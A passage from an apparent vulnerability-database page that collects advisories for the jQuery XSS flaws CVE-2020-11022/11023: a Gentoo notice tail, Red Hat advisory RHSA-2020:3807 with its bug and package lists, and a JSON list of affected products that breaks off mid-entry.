[ 1 ] CVE-2020-11022 https://nvd.nist.gov/vuln/detail/CVE-2020-11022 https://nvd.nist.gov/vuln/detail/CVE-2020-11022 [ 2 ] CVE-2020-11023 https://nvd.nist.gov/vuln/detail/CVE-2020-11023 https://nvd.nist.gov/vuln/detail/CVE-2020-11023 [ 3 ] CVE-2020-14295 https://nvd.nist.gov/vuln/detail/CVE-2020-14295 https://nvd.nist.gov/vuln/detail/CVE-2020-14295
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202007-03 https://security.gentoo.org/glsa/202007-03
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org https://bugs.gentoo.org/.
License
Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 https://creativecommons.org/licenses/by-sa/2.5
. Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Solution:
Before applying this update, ensure all previously released errata relevant to your system is applied.
See the following documentation, which will be updated shortly for release 3.11.219, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_r elease_notes.html
This update is available via the Red Hat Network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat Virtualization security, bug fix, and enhancement update Advisory ID: RHSA-2020:3807-01 Product: Red Hat Virtualization Advisory URL: https://access.redhat.com/errata/RHSA-2020:3807 Issue date: 2020-09-23 CVE Names: CVE-2020-8203 CVE-2020-11022 CVE-2020-11023 CVE-2020-14333 ==================================================================== 1. Summary:
An update is now available for Red Hat Virtualization Engine 4.4.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch
- Description:
The org.ovirt.engine-root is a core component of oVirt.
The following packages have been upgraded to a later upstream version: ansible-runner-service (1.0.5), org.ovirt.engine-root (4.4.2.3), ovirt-engine-dwh (4.4.2.1), ovirt-engine-extension-aaa-ldap (1.4.1), ovirt-engine-ui-extensions (1.2.3), ovirt-log-collector (4.4.3), ovirt-web-ui (1.6.4), rhvm-branding-rhv (4.4.5), rhvm-dependencies (4.4.1), vdsm-jsonrpc-java (1.5.5). (BZ#1674420, BZ#1866734)
A list of bugs fixed in this update is available in the Technical Notes book:
https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/ht ml-single/technical_notes
Security Fix(es):
-
nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)
-
jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)
-
jQuery: passing HTML containing elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)
-
ovirt-engine: Reflected cross site scripting vulnerability (CVE-2020-14333)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
Cannot assign direct LUN from FC storage - grayed out (BZ#1625499)
-
VM portal always asks how to open console.vv even it has been set to default application. (BZ#1638217)
-
RESTAPI Not able to remove the QoS from a disk profile (BZ#1643520)
-
On OVA import, qemu-img fails to write to NFS storage domain (BZ#1748879)
-
Possible missing block path for a SCSI host device needs to be handled in the UI (BZ#1801206)
-
Scheduling Memory calculation disregards huge-pages (BZ#1804037)
-
Engine does not reduce scheduling memory when a VM with dynamic hugepages runs. (BZ#1804046)
-
In Admin Portal, "Huge Pages (size: amount)" needs to be clarified (BZ#1806339)
-
Refresh LUN is using host from different Data Center to scan the LUN (BZ#1838051)
-
Unable to create Windows VM's with Mozilla Firefox version 74.0.1 and greater for RHV-M GUI/Webadmin portal (BZ#1843234)
-
[RHV-CNV] - NPE when creating new VM in cnv cluster (BZ#1854488)
-
[CNV&RHV] Add-Disk operation failed to complete. (BZ#1855377)
-
Cannot create KubeVirt VM as a normal user (BZ#1859460)
-
Welcome page - remove Metrics Store links and update "Insights Guide" link (BZ#1866466)
-
[RHV 4.4] Change in CPU model name after RHVH upgrade (BZ#1869209)
-
VM vm-name is down with error. Exit message: unsupported configuration: Can't add USB input device. USB bus is disabled. (BZ#1871235)
-
spec_ctrl host feature not detected (BZ#1875609)
Enhancement(s):
-
[RFE] API for changed blocks/sectors for a disk for incremental backup usage (BZ#1139877)
-
[RFE] Improve workflow for storage migration of VMs with multiple disks (BZ#1749803)
-
[RFE] Move the Remove VM button to the drop down menu when viewing details such as snapshots (BZ#1763812)
-
[RFE] enhance search filter for Storage Domains with free argument (BZ#1819260)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/2974891
- Bugs fixed (https://bugzilla.redhat.com/):
1625499 - Cannot assign direct LUN from FC storage - grayed out 1638217 - VM portal always asks how to open console.vv even it has been set to default application. 1643520 - RESTAPI Not able to remove the QoS from a disk profile 1674420 - [RFE] - add support for Cascadelake-Server CPUs (and IvyBridge) 1748879 - On OVA import, qemu-img fails to write to NFS storage domain 1749803 - [RFE] Improve workflow for storage migration of VMs with multiple disks 1758024 - Long running Ansible tasks timeout and abort for RHV-H hosts with STIG/Security Profiles applied 1763812 - [RFE] Move the Remove VM button to the drop down menu when viewing details such as snapshots 1778471 - Using more than one asterisk in LDAP search string is not working when searching for AD users. 1787854 - RHV: Updating/reinstall a host which is part of affinity labels is removed from the affinity label. 1801206 - Possible missing block path for a SCSI host device needs to be handled in the UI 1803856 - [Scale] ovirt-vmconsole takes too long or times out in a 500+ VM environment. 1804037 - Scheduling Memory calculation disregards huge-pages 1804046 - Engine does not reduce scheduling memory when a VM with dynamic hugepages runs. 1806339 - In Admin Portal, "Huge Pages (size: amount)" needs to be clarified 1816951 - [CNV&RHV] CNV VM migration failure is not handled correctly by the engine 1819260 - [RFE] enhance search filter for Storage Domains with free argument 1826255 - [CNV&RHV]Change name of type of provider - CNV -> OpenShift Virtualization 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1831949 - RESTAPI javadoc contains missing information about assigning IP address to NIC 1831952 - RESTAPI contains malformed link around JSON representation fo the cluster 1831954 - RESTAPI javadoc contains malformed link around oVirt guest agent 1831956 - RESTAPI javadoc contains malformed link around time zone representation 1838051 - Refresh LUN is using host from different Data Center to scan the LUN 1841112 - not able to upload vm from OVA when there are 2 OVA from the same vm in same directory 1843234 - Unable to create Windows VM's with Mozilla Firefox version 74.0.1 and greater for RHV-M GUI/Webadmin portal 1850004 - CVE-2020-11023 jQuery: passing HTML containing elements to manipulation methods could result in untrusted code execution 1854488 - [RHV-CNV] - NPE when creating new VM in cnv cluster 1855377 - [CNV&RHV] Add-Disk operation failed to complete. 1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function 1858184 - CVE-2020-14333 ovirt-engine: Reflected cross site scripting vulnerability 1859460 - Cannot create KubeVirt VM as a normal user 1860907 - Upgrade bundled GWT to 2.9.0 1866466 - Welcome page - remove Metrics Store links and update "Insights Guide" link 1866734 - [DWH] Rebase bug - for the 4.4.2 release 1869209 - [RHV 4.4] Change in CPU model name after RHVH upgrade 1869302 - ansible 2.9.12 - host deploy fixes 1871235 - VM vm-name is down with error. Exit message: unsupported configuration: Can't add USB input device. USB bus is disabled. 1875609 - spec_ctrl host feature not detected 1875851 - Web Admin interface broken on Firefox ESR 68.11
- Package List:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:
Source: ansible-runner-service-1.0.5-1.el8ev.src.rpm ovirt-engine-4.4.2.3-0.6.el8ev.src.rpm ovirt-engine-dwh-4.4.2.1-1.el8ev.src.rpm ovirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.src.rpm ovirt-engine-ui-extensions-1.2.3-1.el8ev.src.rpm ovirt-log-collector-4.4.3-1.el8ev.src.rpm ovirt-web-ui-1.6.4-1.el8ev.src.rpm rhvm-branding-rhv-4.4.5-1.el8ev.src.rpm rhvm-dependencies-4.4.1-1.el8ev.src.rpm vdsm-jsonrpc-java-1.5.5-1.el8ev.src.rpm
noarch: ansible-runner-service-1.0.5-1.el8ev.noarch.rpm ovirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-backend-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-dbscripts-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-dwh-4.4.2.1-1.el8ev.noarch.rpm ovirt-engine-dwh-grafana-integration-setup-4.4.2.1-1.el8ev.noarch.rpm ovirt-engine-dwh-setup-4.4.2.1-1.el8ev.noarch.rpm ovirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.noarch.rpm ovirt-engine-extension-aaa-ldap-setup-1.4.1-1.el8ev.noarch.rpm ovirt-engine-health-check-bundler-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-restapi-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-base-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-cinderlib-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-imageio-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-ovirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-ovirt-engine-common-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-tools-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-tools-backup-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-ui-extensions-1.2.3-1.el8ev.noarch.rpm ovirt-engine-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-webadmin-portal-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-log-collector-4.4.3-1.el8ev.noarch.rpm ovirt-web-ui-1.6.4-1.el8ev.noarch.rpm python3-ovirt-engine-lib-4.4.2.3-0.6.el8ev.noarch.rpm rhvm-4.4.2.3-0.6.el8ev.noarch.rpm rhvm-branding-rhv-4.4.5-1.el8ev.noarch.rpm rhvm-dependencies-4.4.1-1.el8ev.noarch.rpm vdsm-jsonrpc-java-1.5.5-1.el8ev.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-8203 https://access.redhat.com/security/cve/CVE-2020-11022 https://access.redhat.com/security/cve/CVE-2020-11023 https://access.redhat.com/security/cve/CVE-2020-14333 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX2t0HtzjgjWX9erEAQhpWg/+KolNmhmQCrst8TmYsC2IgSdHP+q0LKLj gdPZYu0ixOpwLLiAhrsoDXqL3H3w7UDSKkSISgPMEqEde4Vp+zI37O1q3E/P7CAj rfLGuL1UDEiy0q0g1BP13GrPlg6K4fR5wQAnTB6vD/ZY+wd50Z0T+NGAxd2w68bM R5q1kSOUPc4AZt25FORU2cmp775Y7DWazMWHC77uiJHgyCwVqLtdO09iEnglZDKJ BynwyT8exZKXxmmpE4QZ4X7wNo3Y0mTiRZo5eyxxQpwj9X+qw1V+pBdtMH/C1yhk J+X1f+wDoe2jCx2bqPXqp6EgFSHnJNt96jV0oTdD0f8rMgWcBDStNXdagPBmBCBp t+Kq3BZx0Oqkig4f+DCEmoS0V0fB9UQLg0Q/M9p1bTfYQkbn+BMHL7CAp8UyAzPH A1HlnP7TtQgplFvoap82xt2pXh97VvI6x3sBGHyW4Fz0SykhRYx3dAgmqy5nEssl 5ApWZ87M3l+2tUh4ZOJAtzRDt9sL5KQsXjp1jZaK/gWBsL4Suzr9AIrs4NmRmXnY TzxdXgIY6C+dWmB4TPhcJE5etcvtorqvs93d47yBdpRyO/IlbEw0vLUBdVZZuj9N mqp6RcHqDKm6Yv4B73Ud5my44wSRWVWtBxO6fivQOQG7iqCyIlA3M3LUMkVy+fxc bvmOI0eIsZw=Jhpi -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services data foundation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6.0.0"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1.0-19.1.2"
},
{
"_id": null,
"model": "financial services market risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.0"
},
{
"_id": null,
"model": "financial services liquidity risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.14"
},
{
"_id": null,
"model": "communications billing and revenue management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.3.0"
},
{
"_id": null,
"model": "financial services analytical applications reconciliation framework",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "hospitality materials control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1.2"
},
{
"_id": null,
"model": "financial services data governance for us regulatory reporting",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9"
},
{
"_id": null,
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.4.6"
},
{
"_id": null,
"model": "financial services analytical applications reconciliation framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services basel regulatory capital basic",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "enterprise session border controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.4"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "snapcenter",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "insurance data foundation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "insurance allocation manager for enterprise profitability",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services analytical applications reconciliation framework",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services liquidity risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "insurance accounting analyzer",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "insurance data foundation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "agile product lifecycle management for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "jquery",
"scope": "gte",
"trust": 1.0,
"vendor": "jquery",
"version": "1.2"
},
{
"_id": null,
"model": "financial services basel regulatory capital basic",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services data governance for us regulatory reporting",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "7.0"
},
{
"_id": null,
"model": "blockchain platform",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "21.1.2"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.6"
},
{
"_id": null,
"model": "communications diameter signaling router idih\\:",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.0.0.0"
},
{
"_id": null,
"model": "financial services regulatory reporting for european banking authority",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2.0"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.8"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2.1"
},
{
"_id": null,
"model": "policy automation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.20"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.0"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4.0.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "policy automation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "communications application session controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.8m0"
},
{
"_id": null,
"model": "financial services basel regulatory capital internal ratings based approach",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services market risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.3.6.0.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "financial services basel regulatory capital internal ratings based approach",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "7.70"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.6.1.0"
},
{
"_id": null,
"model": "financial services balance sheet planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "insurance allocation manager for enterprise profitability",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "insurance data foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6-8.1.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.56"
},
{
"_id": null,
"model": "financial services basel regulatory capital basic",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services regulatory reporting for us federal reserve",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.2"
},
{
"_id": null,
"model": "communications services gatekeeper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.0"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.6.0.0"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "financial services data foundation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.20"
},
{
"_id": null,
"model": "storagetek acsls",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.5.1"
},
{
"_id": null,
"model": "snap creator framework",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services basel regulatory capital internal ratings based approach",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0"
},
{
"_id": null,
"model": "jquery",
"scope": "lt",
"trust": 1.0,
"vendor": "jquery",
"version": "3.5.0"
},
{
"_id": null,
"model": "financial services liquidity risk management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0.0.0"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "log correlation engine",
"scope": "lt",
"trust": 1.0,
"vendor": "tenable",
"version": "6.0.9"
},
{
"_id": null,
"model": "communications diameter signaling router idih\\:",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1.1"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.4.0"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services regulatory reporting for us federal reserve",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "max data",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services regulatory reporting for european banking authority",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
